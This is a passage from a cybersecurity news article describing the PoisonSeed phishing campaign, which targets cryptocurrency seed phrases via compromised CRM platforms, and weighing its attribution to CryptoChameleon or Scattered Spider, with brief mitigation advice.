This method represents a shift from traditional phishing tactics, as it delays the theft until victims unknowingly use the compromised seed phrases.
The PoisonSeed campaign shares certain infrastructural similarities with CryptoChameleon, a threat group known for targeting high-net-worth cryptocurrency holders through spear-phishing and SIM-swapping attacks.
Both groups have targeted platforms like Coinbase and Ledger in the past.
However, PoisonSeed’s tactics such as targeting CRM platforms and delaying cash-out efforts differ significantly from CryptoChameleon’s rapid exploitation methods.
While some researchers have attempted to link PoisonSeed to Scattered Spider, another threat group associated with The Comm (a community of Western cybercriminals), Silent Push analysts argue against this attribution.
Scattered Spider primarily focuses on large-scale ransomware attacks against corporate targets and has not been observed engaging in cryptocurrency wallet phishing.
Silent Push researchers have identified over 49 domains linked to PoisonSeed through WHOIS analysis and phishing kit fingerprints.
These domains often feature obscene or generic placeholders in their registration details, such as “asdf” or “123123,” which help track the campaign’s infrastructure.
To mitigate risks posed by PoisonSeed, organizations are advised to monitor indicators of compromise (IOCs) related to these domains and implement robust email security measures.
Silent Push offers enterprise-level feeds for tracking PoisonSeed-related domains and IPs to enhance detection capabilities.
The PoisonSeed campaign highlights an alarming evolution in phishing tactics, blending supply chain compromises with cryptocurrency-targeted schemes.
While its ties to CryptoChameleon remain speculative, its distinct methodologies warrant classification as an independent threat actor group.
Organizations must remain vigilant against such advanced threats that exploit trust in widely used CRM platforms for malicious purposes.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
%20(1).webp?w=696&resize=696,0&ssl=1 "Best XDR Solutions")
